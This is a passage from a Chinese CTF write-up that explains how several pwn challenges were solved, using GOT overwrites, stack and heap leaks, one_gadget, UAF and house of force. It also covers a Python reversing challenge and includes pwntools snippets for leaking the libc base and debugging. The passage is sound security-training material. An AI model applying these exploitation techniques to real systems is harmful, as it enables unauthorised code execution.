</div><p>而v4=atoi(&amp;ntpr),经过搜索atoi函数会跳过字符串开头的空白字符,因此只要构造**(空格)-16**就可以同时绕过上边的两个限制来覆写puts的got表,然后再用\x00绕过strlen的限制就可以执行shellcode,payload如下:</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnqin1yr27j30os01tt9m.jpg" alt=""></p> <p>此时的程序流程如下:</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnqirykfexj30ik0dpq3f.jpg" alt=""></p> <blockquote> <p>至于0x36是怎么来的,我是调试看出来的,如果哪位表哥有静态计算的方法,还请不吝赐教!</p> </blockquote> <h3 id="0x0e-stack">0x0E stack</h3> <p>这个题开了全保护，第一眼看上去挺吓人，但其实漏洞很容易发现，pop时并没有对下标作出检查，这就意味着我们可以通过一直pop利用数组越界从栈上leak，先通过调试看栈结构</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzi618q3bj30ly0f0qd7.jpg" alt=""></p> <p>可以看出，通过一直pop可以泄露**_IO_2_1_stdout_**的地址，进而确定libc的装载基址和one_gadget地址</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">getBase</span><span class="p">():</span> <span class="c1"># debug()</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">15</span><span class="p">):</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;Cmd &gt;&gt;&#34;</span><span class="p">,</span> <span class="s2">&#34;p&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;-&gt; &#34;</span><span class="p">)</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="n">drop</span> <span class="o">=</span> <span class="bp">True</span><span class="p">))</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span><span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s2">&#34;_IO_2_1_stdout_&#34;</span><span class="p">]</span> <span class="n">info</span><span class="p">(</span><span class="s2">&#34;libc_base -&gt; 0x</span><span class="si">%x</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">libc_base</span><span class="p">)</span> <span class="n">one_gadget</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">one_gadget_offset</span> <span class="k">return</span> <span class="n">one_gadget</span> <span class="c1"># return libc_base</span> </code></pre></td></tr></table> </div> </div><p>通过<strong>main+27, main+427</strong>等地址可以泄露elf的装载基址（当然并没有用到），并且经过观察，<strong>main+27, main+427分别是__x86_get_pc_thunk_dx和stack_push的返回地址</strong>，这样我们只需要把main+427覆盖为one_gadget的地址，再次调用stack_push时，就可以返回到one_gadget，进而get shell，有一个坑点是0xf段的地址会发生数据溢出，需要我们转成int32的类型。</p> <p>虽然听起来很麻烦但只要耐心调试并不难，这个题目的flag也说明了本题的重点就是leak from stack。</p> <p><strong>关于这个题有两点值得一提：</strong></p> <ol> <li> <p>刚打开文件使用F5时报错</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzicish9aj30b404laa0.jpg" alt=""></p> <p>很容易搜索到这是因为函数的参数个数不匹配，我们定位到0x78D，发现540这个函数有一个参数，但IDA并没有正确识别</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzie9234pj30n107k74e.jpg" alt=""></p> <p>手动指定一个参数后（快捷键y指定类型），这个函数的报错就解决了</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzifymdtnj30mn072mx8.jpg" alt=""></p> <p>同样的方法修复之后的报错，就可以F5查看伪代码了</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzihpdrbkj30tg0chweo.jpg" alt=""></p> <p>实现查看伪代码后，可以通过查看函数的具体实现进一步识别函数和修正函数参数</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzijqjkxmj30dw03d0sm.jpg" alt=""></p> <p>如上图的578函数，可以看出实际调用了hex(8128 + 56)这个地址，而这个地址在IDA中可以看出是scanf的地址，这样我们就可以通过scanf的参数列表进一步修正参数了，附一张我修复之后的图</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzinjzwknj30mv0d0jri.jpg" alt=""></p> <p>这样在通过对比题目给出的源码，就很容易分析程序的功能了</p> <ol start="2"> <li> <p>这个题目开启了PIE保护，利用pwn.gdb.attach调试的时候和没有开启PIE保护的有些不同。</p> <p>以前我调试开启了PIE保护elf的方式是Uriel师傅教我的先找elf装载基址</p> </li> </ol> </li> </ol> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">sys</span><span class="o">,</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">re</span> <span class="n">wordSz</span> <span class="o">=</span> <span class="mi">4</span> <span class="n">hwordSz</span> <span class="o">=</span> <span class="mi">2</span> <span class="n">bits</span> <span class="o">=</span> <span class="mi">32</span> <span class="n">PIE</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">mypid</span><span class="o">=</span><span class="mi">0</span> <span class="n">context</span><span class="p">(</span><span class="n">arch</span><span class="o">=</span><span class="s1">&#39;amd64&#39;</span><span class="p">,</span> <span class="n">os</span><span class="o">=</span><span class="s1">&#39;linux&#39;</span><span class="p">,</span> <span class="n">log_level</span><span class="o">=</span><span class="s1">&#39;debug&#39;</span><span class="p">)</span> <span class="k">def</span> <span class="nf">leak</span><span class="p">(</span><span class="n">address</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;/proc/</span><span class="si">%s</span><span class="s1">/mem&#39;</span> <span class="o">%</span> <span class="n">mypid</span><span class="p">)</span> <span class="k">as</span> <span class="n">mem</span><span class="p">:</span> <span class="n">mem</span><span class="o">.</span><span class="n">seek</span><span class="p">(</span><span class="n">address</span><span class="p">)</span> <span class="k">return</span> <span class="n">mem</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="k">def</span> <span class="nf">findModuleBase</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="n">mem</span><span class="p">):</span> <span class="n">name</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">readlink</span><span class="p">(</span><span class="s1">&#39;/proc/</span><span class="si">%s</span><span class="s1">/exe&#39;</span> <span class="o">%</span> <span class="n">pid</span><span class="p">)</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;/proc/</span><span class="si">%s</span><span class="s1">/maps&#39;</span> <span class="o">%</span> <span class="n">pid</span><span class="p">)</span> <span class="k">as</span> <span class="n">maps</span><span class="p">:</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">maps</span><span class="p">:</span> <span class="k">if</span> <span class="n">name</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span> <span class="n">addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;-&#39;</span><span class="p">)[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">16</span><span class="p">)</span> <span class="n">mem</span><span class="o">.</span><span class="n">seek</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="k">if</span> <span class="n">mem</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="o">==</span> <span class="s2">&#34;</span><span class="se">\x7f</span><span class="s2">ELF&#34;</span><span class="p">:</span> <span class="n">bitFormat</span> <span class="o">=</span> <span class="n">u8</span><span class="p">(</span><span class="n">leak</span><span class="p">(</span><span class="n">addr</span> <span class="o">+</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="k">if</span> <span class="n">bitFormat</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span> <span class="k">global</span> <span class="n">wordSz</span> <span class="k">global</span> <span class="n">hwordSz</span> <span class="k">global</span> <span class="n">bits</span> <span class="n">wordSz</span> <span class="o">=</span> <span class="mi">8</span> <span class="n">hwordSz</span> <span class="o">=</span> <span class="mi">4</span> <span class="n">bits</span> <span class="o">=</span> <span class="mi">64</span> <span class="k">return</span> <span class="n">addr</span> <span class="n">log</span><span class="o">.</span><span class="n">failure</span><span class="p">(</span><span class="s2">&#34;Module&#39;s base address not found.&#34;</span><span class="p">)</span> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">def</span> <span class="nf">debug</span><span class="p">(</span><span class="n">addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">):</span> <span class="k">global</span> <span class="n">mypid</span> <span class="n">mypid</span> <span class="o">=</span> <span class="n">proc</span><span class="o">.</span><span class="n">pidof</span><span class="p">(</span><span class="n">r</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span> <span class="nb">raw_input</span><span class="p">(</span><span class="s1">&#39;debug:&#39;</span><span class="p">)</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">&#39;/proc/</span><span class="si">%s</span><span class="s1">/mem&#39;</span> <span class="o">%</span> <span class="n">mypid</span><span class="p">)</span> <span class="k">as</span> <span class="n">mem</span><span class="p">:</span> <span class="n">moduleBase</span> <span class="o">=</span> <span class="n">findModuleBase</span><span class="p">(</span><span class="n">mypid</span><span class="p">,</span> <span class="n">mem</span><span class="p">)</span> <span class="n">gdb</span><span class="o">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="s2">&#34;set follow-fork-mode parent</span><span class="se">\n</span><span class="s2">b *&#34;</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">moduleBase</span><span class="o">+</span><span class="n">addr</span><span class="p">))</span> </code></pre></td></tr></table> </div> </div><p>但做这道题题时发现pwn.gdb.attach只有第一个参数是必须的</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnziwaesg0j30og0m7k21.jpg" alt=""></p> <p>这样就可以先进入gdb，通过vmmap找到elf基址后在下断点进行调试了</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnziz8gnhoj309j02iaag.jpg" alt=""></p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnziyk9lebj30qj0eqtio.jpg" alt=""></p> <h3 id="0x0f-very_overflow">0x0F very_overflow</h3> <p>这个题目给了源码，分析起来方便了不少。这个题的漏洞也很容易发现，虽然申请了长度为 128 * (sizeof(buffer))的缓冲区，但可以无限的add_note，这就意味着我们可以先重复add_note耗尽缓冲区，然后继续add_note和show_note时，就可以leak类似__libc_start_main这些信息来确定libc装载基址了，有了libc装载基址后，通过rop构造system(&quot;/bin/sh&rdquo;)或者one_gadget都可以求解</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzjfuveuaj30ti0bh0zy.jpg" alt=""></p> <p>至于add_note多少次，通过调试可以很清楚的算出来</p> <p>另外就是刚开始本地可以get shell，但远程连接很容易超时，后来把context.log_level换成了info，减少了打印花费的时间，又把io.sendlineafter换成了直接io.sendline，就不容易超时了</p> <h3 id="0x10-notepad">0x10 notepad</h3> <p>这道题目的菜单输入那里乍看起来很奇怪,因为执行哪个分支是根据ord(input) - ord(&lsquo;a&rsquo;) 来决定的,当输入小于a时又没有做容错处理(似乎本题也只有这一个漏洞). 仔细分析，在notepad_open函数里，有一个根据输入执行特定函数的机会，这样只要我们精心构造chunk布局和输入,让当前notepad_open函数根据我们的输入执行特定函数时,执行上一个chunk中我们填好的函数,这样我们就有了执行任意函数的能力,一图胜千言,用下图来表示此过程:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> +-------+-------+ |prev0 |size0 | +-------+-------+ |show_func_ptr | &lt;- chunk0 +---------------+ |destory_fun_ptr| +---------------+ |rdonly | +---------------+ |size | +---------------+ |.... | |data | |evil_func | |.... | +-------+-------+ |prev1 |size1 | +-------+-------+ |show_func_ptr | &lt;- chunk1 +---------------+ |destory_fun_ptr| +---------------+ |rdonly | +---------------+ |size | +---------------+ |.... | |data | ++--------------+ 如上图,题目希望我们在notepad_open(chunk1)时,退出时使用chunk1的show_func_ptr或者destory_fun_ptr函数指针,但因为没有检测输入为负,我们可以在前一个chunk(chunk0)中的data中写好evil_func的地址,控制输入,输入合理的负数执行该函数,这样只要合理的控制,我们就有了执行任意函数的能力 </code></pre></td></tr></table> </div> </div><p>我的做法分为以下几步:</p> <ol> <li> <p>先通过该漏洞 free 一个 chunk,造成 uaf</p> </li> <li> <p>再利用该漏洞 puts freed_chunk 来 leak libc</p> </li> <li> <p>gets读入 $0\0/sh\0</p> </li> <li> <p>执行 system(&ldquo;$0&rdquo;)</p> </li> </ol> <h3 id="0x11-mailer">0x11 mailer</h3> <p>很明显,gets那里能够arbitrary overflow, 又没开NX保护, 直接利用arbitrary overflow修改top_chunk,使用house of force修改got到shellcode的地址即可, 没什么好说的</p> <h3 id="0x12-tictactoe-1">0x12 tictactoe-1</h3> <p>给的elf文件逆起来比较繁琐，通过反编译可以找到棋的源码，了解了程序的大体流程后，可以发现在落子时可以通过数组越界覆写GOT表</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzjlzdk5mj30lt0c2mxc.jpg" alt=""></p> <p>但因为程序有一个判负退出的功能，因此经过实验最多只能写三个字节，但对第一题而言，三个字节已经足够overwrite memset@got为打印flag的地址</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fnzjpd156mj30qn0bw0sx.jpg" alt=""></p> <p>第一题很快就解决了，至于tictatoe-2，虽然get shell拿到了flag，但根据flag形式需要用ret2dl_solve，等我用ret2dl_solve解决时再来补wp</p> <h2 id="reverse">reverse</h2> <h3 id="0x00-helloworld">0x00 helloworld:</h3> <h3 id="0x01-simple">0x01 simple:</h3> <p>都是水题，不再细说</p> <h3 id="0x03-pyyy">0x03 pyyy</h3> <p>这一题用uncomplye6或者在线网站反编译后，得到的python代码都有大量的lambda操作，读起来十分费力，并且代码不能直接运行，仔细观察，代码中有一行</p> <blockquote> <p>​ this_is = &lsquo;Y-Combinator&rsquo;</p> </blockquote> <p>似乎是在暗示什么，google了一发，在 <a href="https://rosettacode.org/wiki/Y_combinator#Python">https://rosettacode.org/wiki/Y_combinator#Python</a> 找到了Y-Combinator的介绍，即利用lambda等操作实现递归，于是按照网站上给出的python实例修改了代码，使其能够正确执行。再仔细观察，发现只要我们每轮的输入都和程序每轮计算的值相等即可得到flag，因此直接修改python代码，让输入等于程序计算好的值，修改好的代码如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="c1"># uncompyle6 version 2.12.0</span> <span class="c1"># Python bytecode 2.7 (62211)</span> <span class="c1"># Decompiled from: Python 2.7.13 (default, Jan 19 2017, 14:48:08) </span> <span class="c1"># [GCC 6.3.0 20170118]</span> <span class="c1"># Embedded file name: pyyy.py</span> <span class="c1"># Compiled at: 2016-06-12 01:14:31</span> <span class="kn">from</span> <span class="nn">fractions</span> <span class="kn">import</span> <span class="n">gcd</span> <span class="nb">__import__</span><span class="p">(</span><span class="s1">&#39;sys&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">setrecursionlimit</span><span class="p">(</span><span class="mi">1048576</span><span class="p">)</span> <span class="n">data</span> <span class="o">=</span> <span class="s1">&#39;Tt1PJbKTTP+nCqHvVwojv9K8AmPWx1q1UCC7yAxMRIpddAlH+oIHgTET7KHS1SIZshfo2DOu8dUt6wORBvNVBpUSsuHa0S78KG+SCQtB2lr4c1RPbMf0nR9SeSm1ptEY37y310SJMY28u6m4Y44qniGTi39ToHRTyxwsbHVuEjf480eeYAfSVvpWvS8Oy2bjvy0QMVEMSkyJ9p1QlGgyg3mUnNCpSb96VgCaUe4aFu4YbOnOV3HUgYcgXs7IcCELyUeUci7mN8HSvNc93sST6mKl5SDryngxuURkmqLB3azioL6MLWZTg69j6dflQIhr8RvOLNwRURYRKa1g7CKkmhN4RytXn4nyK2UM/SoR+ntja1scBJTUo0I31x1wBJpT4HjDN47FLQWIkRW+2wnB3eEwO5+uSiQpzA8VaH7VGRrlU/BFW4GqbaepzKPLdXQFBkNyBKzqzR/zA2GIrYbLIVScWJ19DqJCOyVLGeVIVXyzN1y327orYL2Ee3lRITnE3FouicRStaznIcw8xmxvukwVMRZIJ/vTu8Zc1WQIYEIFXMHozGuvzZgROZTyFihWNRCBBtoP9DJJALJb0pA1IKIb2zLh+pwGF40Y6y93D6weKejGPO+A0DBXH9vuLcCcCIvr/XPQhO3jLKCBN+h9unuJKW3dyWxyaVPdR2V+BTw10VXolo7yaTH1GbR4TiVSB308mBOMwfchwihEe7RdMXvmXgaGarKkJe0NLUCd8jwhYII+WymjxO/xOz/ppOvNfAyIQksW0sggRPQTlgXSZ7MIVA1h66sGNljJ833MoFzWof3azLabaz1OrAJFqYXBg/myDsy1tV6rULSQ82hVR/TNnSmBGvyEDJTrLSwHyj78NOrW4mUnlLGBnAgWfw6pW2lRK2jkNX9NM6DfLsRK8lwl85UP8CZSuNdcLmLwHTVMZGm/cNkZCtWRBlZqEggxGdIO44D+f4y6ysnAk5/QzEwjIuecxEOb0jyV6dFui8g0c3Oxlhzcli0X8ToJFyeQRv1N9nokYZ07tFlG6m18kCToKz1qiH1U7kljXa6SvdORur5dWYLQ//gwhwppe7JlNda/cEoh92h96wRZDv1dSK/f1vz+mUeUyUlFY0iMjfw5eBXWZppNZi3ZtJcq5kllM2ACVFcxQWI3azM3ArOcqjosoiPjNoDYgKh7w4k2Cd0kLYEHscz/njtJ1KEcwLtqs4nJ+gB2r4V9g03YgvY5E8JJtfJMKdaTedjtvEuif8FNlCK9DMnL1iLpWptJbdfO83Y7Y46XCqjZFBI5o9Qtb78nLhMEM5/YTaNOM/wE/oJl5HI/i1X6kW3PKCsVubRkOkc2xawl6NYdLETjLvmrGhhI&#39;</span> <span class="n">a</span> <span class="o">=</span> <span class="il">138429774382724799266162638867586769792748493609302140496533867008095173455879947894779596310639574974753192434052788523153034589364467968354251594963074151184337695885797721664543377136576728391441971163150867881230659356864392306243566560400813331657921013491282868612767612765572674016169587707802180184907L</span> <span class="n">b</span> <span class="o">=</span> <span class="il">166973306488837616386657525560867472072892600582336170876582087259745204609621953127155704341986656998388476384268944991674622137321564169015892277394676111821625785660520124854949115848029992901570017003426516060587542151508457828993393269285811192061921777841414081024007246548176106270807755753959299347499L</span> <span class="n">c</span> <span class="o">=</span> <span class="il">139406975904616010993781070968929386959137770161716276206009304788138064464003872600873092175794194742278065731836036319691820923110824297438873852431436552084682500678960815829913952504299121961851611486307770895268480972697776808108762998982519628673363727353417882436601914441385329576073198101416778820619L</span> <span class="n">d</span> <span class="o">=</span> <span class="il">120247815040203971878156401336064195859617475109255488973983177090503841094270099798091750950310387020985631462241773194856928204176366565203099326711551950860726971729471331094591029476222036323301387584932169743858328653144427714133805588252752063520123349229781762269259290641902996030408389845608487018053L</span> <span class="n">e</span> <span class="o">=</span> <span class="il">104267926052681232399022097693567945566792104266393042997592419084595590842792587289837162127972340402399483206179123720857893336658554734721858861632513815134558092263747423069663471743032485002524258053046479965386191422139115548526476836214275044776929064607168983831792995196973781849976905066967868513707L</span> <span class="n">F</span> <span class="o">=</span> <span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span> <span class="n">m</span> <span class="o">=</span> <span class="il">8804961678093749244362737710317041066205860704668932527558424153061050650933657852195829452594083176433024286784373401822915616916582813941258471733233011L</span> <span class="n">g</span> <span class="o">=</span> <span class="il">67051725181167609293818569777421162357707866659797065037224862389521658445401L</span> <span class="n">z</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">f</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">F</span><span class="p">):</span> <span class="n">n</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">m</span><span class="p">,</span> <span class="n">g</span><span class="p">)</span> <span class="c1">#https://rosettacode.org/wiki/Y_combinator#Python</span> <span class="n">this_is</span> <span class="o">=</span> <span class="s1">&#39;Y-Combinator&#39;</span> <span class="c1"># l = (lambda f: (lambda x: x(x))(lambda y: f(lambda *args: y(y)(*args))))</span> <span class="n">Y</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">f</span><span class="p">:</span> <span class="p">(</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span><span class="p">(</span><span class="n">x</span><span class="p">))(</span><span class="k">lambda</span> <span class="n">y</span><span class="p">:</span> <span class="n">f</span><span class="p">(</span><span class="k">lambda</span> <span class="o">*</span><span class="n">args</span><span class="p">:</span> <span class="n">y</span><span class="p">(</span><span class="n">y</span><span class="p">)(</span><span class="o">*</span><span class="n">args</span><span class="p">)))</span> <span class="n">fun</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">f</span><span class="p">:</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="p">(</span><span class="mi">1</span> <span class="k">if</span> <span class="n">x</span> <span class="o">&lt;</span> <span class="mi">2</span> <span class="k">else</span> <span class="n">f</span><span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">x</span> <span class="o">%</span> <span class="n">n</span><span class="p">)</span> <span class="n">l</span> <span class="o">=</span> <span class="n">Y</span><span class="p">(</span><span class="n">fun</span><span class="p">)(</span><span class="n">g</span> <span class="o">%</span> <span class="mi">27777</span><span class="p">)</span> <span class="c1"># Y = lambda f: (lambda x: x(x))(lambda y: f(lambda *args: y(y)(*args)))</span> <span class="c1"># fac = lambda f: lambda n: (1 if n&lt;2 else n*f(n-1))</span> <span class="c1"># &gt;&gt;&gt; [ Y(fac)(i) for i in range(10) ]</span> <span class="c1"># [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880]</span> <span class="c1"># &gt;&gt;&gt; fib = lambda f: lambda n: 0 if n == 0 else (1 if n == 1 else f(n-1) + f(n-2))</span> <span class="c1"># &gt;&gt;&gt; [ Y(fib)(i) for i in range(10) ]</span> <span class="c1"># [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]</span> <span class="c1"># print l</span> <span class="c1"># c = raw_input(&#39;Channenge #%d:&#39; % i)</span> <span class="n">c</span> <span class="o">=</span> <span class="n">l</span> <span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="o">!=</span> <span class="n">l</span><span class="p">:</span> <span class="k">print</span> <span class="s1">&#39;Wrong~&#39;</span> <span class="nb">exit</span><span class="p">()</span> <span class="n">z</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">l</span><span class="p">)</span> <span class="n">z</span><span class="o">.</span><span class="n">sort</span><span class="p">()</span> <span class="n">gg</span> <span class="o">=</span> <span class="s1">&#39;(flaSg</span><span class="se">\&#39;</span><span class="s1">7 </span><span class="se">\\</span><span class="s1">h#GiQwt~66</span><span class="se">\x0c</span><span class="s1">sxCN]4sT{? Zx YCf6S&gt;|~`</span><span class="se">\x0c</span><span class="s1">$/}</span><span class="se">\&#39;\r</span><span class="s1">:4DjJFvm]([sP</span><span class="si">%F</span><span class="s1">MY&#34;@=YS;CQ7T#zx42#$S_j0</span><span class="se">\\</span><span class="s1">Lu^N31=r</span><span class="se">\x0b\t\t</span><span class="s1">jVhhb_KM$|6]</span><span class="se">\n</span><span class="s1">l!:V</span><span class="se">\r</span><span class="s1">x8P[0m ;ho_</span><span class="se">\r</span><span class="s1">R(0/~9HgE8!ec*AsGd[e|2&amp;h!}GLGt</span><span class="se">\&#39;</span><span class="s1">=$</span><span class="se">\x0c</span><span class="s1">bKFMnbez-q</span><span class="se">\\</span><span class="s1">`I~];@$y#bj9K0xmI2#8 sl^gBNL@fUL</span><span class="se">\x0b\\</span><span class="s1">9Ohf]c&gt;Vj/&gt;rnWXgLP#&lt;+4$BG@,</span><span class="se">\&#39;</span><span class="s1">n a_7C:-}f(WO8Y</span><span class="se">\x0c</span><span class="s1">2|(nTP!</span><span class="se">\&#39;\\</span><span class="s1">&gt;^</span><span class="se">\&#39;</span><span class="s1">}-7+AwBV!w7KUq4Qpg</span><span class="se">\t</span><span class="s1">f.}Z7_!m+ypy=`3#</span><span class="se">\\</span><span class="s1">=?9B4=?^}&amp;</span><span class="se">\&#39;</span><span class="s1">~ Z@OH8</span><span class="se">\n</span><span class="s1">0=6</span><span class="se">\x0b\t</span><span class="s1">v</span><span class="se">\n</span><span class="s1">l!G</span><span class="se">\&#39;</span><span class="s1">y4dQW5!~g~I*f&#34;rz1{qQH{G9</span><span class="se">\x0c\&#39;</span><span class="s1">b</span><span class="se">\x0c</span><span class="s1">p</span><span class="se">\x0b</span><span class="s1">du!2/</span><span class="se">\\</span><span class="s1">@i4eG&#34;If0A{-)N=6GMC&lt;U5/ds</span><span class="se">\r</span><span class="s1">G&amp;z&gt;P1</span><span class="se">\n</span><span class="s1">sq=5&gt;dFZUWtjv</span><span class="se">\t</span><span class="s1">X~^?9?Irwx</span><span class="se">\\</span><span class="s1">5A!32N</span><span 